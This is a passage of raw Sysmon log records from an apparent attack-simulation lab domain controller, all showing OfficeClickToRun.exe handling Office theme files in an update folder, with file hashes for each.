Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\WATER\WATER.INFMD5=63E2E89F25CD6C90F6DE2F92E33CAF7D,SHA256=4DF728DA652193F0AB69188977DC1AA0A5377E1FF1A1E26E86AB97784D083362,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071231Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.735{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\WATER\WATER.ELMMD5=4E9217B8378494F4F91A5F99EEF28802,SHA256=0E11F41027730AF2FDA94CE7649AC25041359108C2DE4C875B00160E27D1B7F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071230Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.735{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\WATER\THMBNAIL.PNGMD5=98064570E3B9604CBFF7F5CA1B0FDD94,SHA256=9274B2344A6647687117F92E6C1B19EBEE9F5BDF4AB5E36EED6A643ACFF72D30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071229Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\WATER\PREVIEW.GIFMD5=5E9A13033FB5337C56FA29ABE5EB5B44,SHA256=D153285C008ADFCF12990FDCD1F1523456C1AC763DA06B9E731A6F91B427E005,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071228Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SUMIPNTG\THMBNAIL.PNGMD5=62CAACC449BC5EED31482CE1AAA50893,SHA256=A4CA7C53E5217BE9831A893BE66F929D8DD17CB88FBF0B4B200E29374BAE8878,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071227Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SUMIPNTG\SUMIPNTG.INFMD5=DF6B1690621B690AA89B8392656FF228,SHA256=0B759C3FB8A35D77625EA0E56A98A200E359D361D02458E51B7B81A66788B33B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071226Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SUMIPNTG\SUMIPNTG.ELMMD5=C28E37335BD78E5035406AB81E03A3D5,SHA256=1F785E694D0D8EF7AF167FD24A3B132A9BEC424B71CB6B547676697C2BDEED34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071225Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SUMIPNTG\PREVIEW.GIFMD5=7299DDBB6907E79C4931D5FECB865434,SHA256=F0FB02EE401BC09AF0862E05046E38D65CD1BDA1540D43590F430535F0EE0E05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071224Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\STUDIO\THMBNAIL.PNGMD5=808C7637F14B2E24B8A466C351A86EBB,SHA256=052F544267D47AA0C3866E138D084D8545E227F4722B4B459AF53B28961ECFA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071223Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\STUDIO\STUDIO.INFMD5=AB516394217E1E49A053C974F5B3EBA8,SHA256=0254300E09A4C1552E4CDBF65CB64CF8A87BEA75FF8C1786BDA30C2052604416,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071222Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\STUDIO\STUDIO.ELMMD5=055A948852E637092C573492A1F41835,SHA256=1ACB76CC64F979DF6ECB975A8E98D2F941718EB1F6908AADC61BA93185242704,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071221Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\STUDIO\PREVIEW.GIFMD5=CC7EBF71409B855CF9578A2178BABCC6,SHA256=1D74B13E7DFAF744A56FFC6906CF2EB59E9FD674621392DCABD50C375FBBE551,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071220Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.704{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\STRTEDGE\THMBNAIL.PNGMD5=BABF2714A3C374BC74279EB1A7503730,SHA256=050C6F742204F9F6322AE444B58BB3A2BCBEFBB790DD67B9C07AA45EB0646D8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071219Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.704{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\STRTEDGE\STRTEDGE.INFMD5=2ADD8E4F53D97DF580A38BB7F9960A78,SHA256=6F7E8A85E4BC01FB3545F10AD939B87282157CF517B02E4C5E787C7843E626BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071218Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.704{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\STRTEDGE\STRTEDGE.ELMMD5=9C0ABBD88A17394ADDE4EB1797421486,SHA256=821DBE2C6DD6039462134158B071076D7CDD7E8321FEB5CF9C67BA78503C45A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071217Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.704{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\STRTEDGE\PREVIEW.GIFMD5=DDDBDA88B8CE10FEEBA357EB5BD82332,SHA256=2E1BDCF8236713F50A48FBAF1AB85D90D78F87A40A6A59BE4629D563C2D6A293,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071216Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.704{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SPRING\THMBNAIL.PNGMD5=FEE1A457532B54E1FA1147C3EB5DC7C4,SHA256=7F45F2582EC51D436258482EBC3230D3152D768D91527FC9F3D525883728D97E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071215Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.704{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SPRING\SPRING.INFMD5=7E06C52730B6247308068BA87B96BFE9,SHA256=615BD89F6AEB823F7322C5D871E02237617D24174A35039633C37C4BA94BA220,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071214Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.704{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SPRING\SPRING.ELMMD5=9AFB419EBEA07672C2D982CAB8C27A40,SHA256=ADD5383BBC65F268188EC8F90C75149FBBE7FCCAD4C2819D4A99602FEE9A0BE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071213Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.704{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SPRING\PREVIEW.GIFMD5=B9C82304A21BFDD6C5B1CC6476FCF100,SHA256=89A51DA8AB8E640032087B9AFDC874E084412C3AB49E5840EE8EC13671AABD89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071212Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.704{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SONORA\THMBNAIL.PNGMD5=B9687E8F0C1DCCB841E26CF16204D3C8,SHA256=6B83B00134CA654D5ACC0C9057B2B85E242697C83984723D5633FB4B770CAAB8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071211Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.704{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SONORA\SONORA.INFMD5=5F9338C1432F65FC24F738835D2ECB15,SHA256=679FDA9DE75041673C2C21DCFC8931E3E77215E416B0BBA47E2777004E7C71AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071210Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.704{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SONORA\SONORA.ELMMD5=E53E20970E92EE5DE3B6D0100FDBD381,SHA256=2EA74D51E3574546FD99A012A4343FD4C4BB69A1657E80CEFBF8A11098E8408F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071209Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.688{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SONORA\PREVIEW.GIFMD5=2DB3B087B4C49C4F64329C42717D4C19,SHA256=DD7648D32094EF14BAE42ED234478AA9B5CC7FF0582B1376EB880E53BFB85C83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071208Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.688{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SLATE\THMBNAIL.PNGMD5=2F432751D4367807C39B186183FCFBE3,SHA256=7CAE1977C72CB79BD2E90D259A3B1C3629095CD78B5EAEBF3221600B4050CF19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071207Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.688{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SLATE\SLATE.INFMD5=399297F1492FB054FCEA7A9CBC1AE783,SHA256=26E51C7C912EDC1450B054E2C5DBC74D72DB15F7525FBA9B171FA4036D1C32DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071206Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.688{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SLATE\SLATE.ELMMD5=8252C81A291242E2FD8DF9910397F9EB,SHA256=310B8E8C55F84AAB27B9D993393B1C0CC143C6784CCF150143DA9D46A1257D16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071205Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.688{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SLATE\PREVIEW.GIFMD5=B92780842A88A7A1F4B1D2D6D36CA5C7,SHA256=5E91F9F46EC1209A795FA34996591C766906E678D3BB0D37C59D3BA61C537D27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071204Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.688{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SKY\THMBNAIL.PNGMD5=F16A1C74515BFA92CEB97ACCD2569271,SHA256=EDE8924BBE479A96B00957F1D32D0388D689D9CC5860A9D4B28228BD16756F65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071203Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.688{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SKY\SKY.INFMD5=65BCDF1892F3A327A29FD273020A13E5,SHA256=72FD3D2C0BD2EE3A27A890A55801EDFC102318F15421B22D3C72F146D851A26A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071202Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.688{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SKY\SKY.ELMMD5=9379BA105894633A3B88C4039C9B8A11,SHA256=295DA3E706FFE86340DB9CCEDE6128F7B6F60A785840A47FEB2DB4B1765989A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071201Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.688{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SKY\PREVIEW.GIFMD5=A48529759399DE66C561CB59EFE965DD,SHA256=B5EFDC847FF8A78024157FA53ECF599FFFF0DF14ADF793D1AE6598B12221E7CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071200Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SATIN\THMBNAIL.PNGMD5=48EA8D92E9DDCAF16ADEEAB7BE2DB07B,SHA256=2D67AAA2BE7FE03E3BADE483BA6AB3D23648944846F2B33CBD146F54C4D7F876,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071199Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SATIN\SATIN.INFMD5=FC93020E11D1149FCC74CA9D59D34CCB,SHA256=64277F042E9DF549500D5EEC7A58DACD64A33C0693FA4A1A9700C91172716BF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071198Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SATIN\SATIN.ELMMD5=53E0547DBCB723E3252B602B9DE4C404,SHA256=B7E1BF5092BB5E9B286FC8704CD0E922A298BE71E76E82611984BD418C469192,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071197Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SATIN\PREVIEW.GIFMD5=C93CA02421BBF090F51FDB38AEB9A4B0,SHA256=9DF7B3D6323CA7AB634EECDF86C402B40B2D7F5A96B38121942654F9207DD58F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071196Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RMNSQUE\THMBNAIL.PNGMD5=2BDEF1B25723CBC7C62D1239D7CFF36C,SHA256=D2D2B31A91F6CF72DFE150C6874296147ED5D430344B2779DD9572BF5EE75474,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071195Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RMNSQUE\RMNSQUE.INFMD5=74B22FBDE8DC4E3955AA802D7C553101,SHA256=99008D636F12EF2DDCBB4D9AAF11EF8233FF4A158B08ADF6AEEAC3BB5B6CEABB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071194Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RMNSQUE\RMNSQUE.ELMMD5=0F414D10894B67FFF5686F30CF86CC9E,SHA256=FCCA843E121006A3AD1BE509DD020429E09B80ACA77B0EDA922DF13AE16B4D03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071193Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RMNSQUE\PREVIEW.GIFMD5=CED6DEC94C6466E41830330EC1325193,SHA256=2432AA8714D3DB4996B6F13AED8C36A5A78CBF4BC514743695BB3B27FE423703,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071192Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.657{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RIPPLE\THMBNAIL.PNGMD5=A12FD9AA1C6487FE1815E57BAB4CF461,SHA256=B0CF9EB6EFBF3A1590961BC89CD86FAFE9A19CB41801C29518689011B81E4289,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071191Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.657{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RIPPLE\RIPPLE.INFMD5=8B19B82859FFE63B8CE12B5C28C29A08,SHA256=53458DD18EF8058A8E89A83C7D840AF5090B8D8DCDDEDC7E28B88926B27EE782,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071190Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 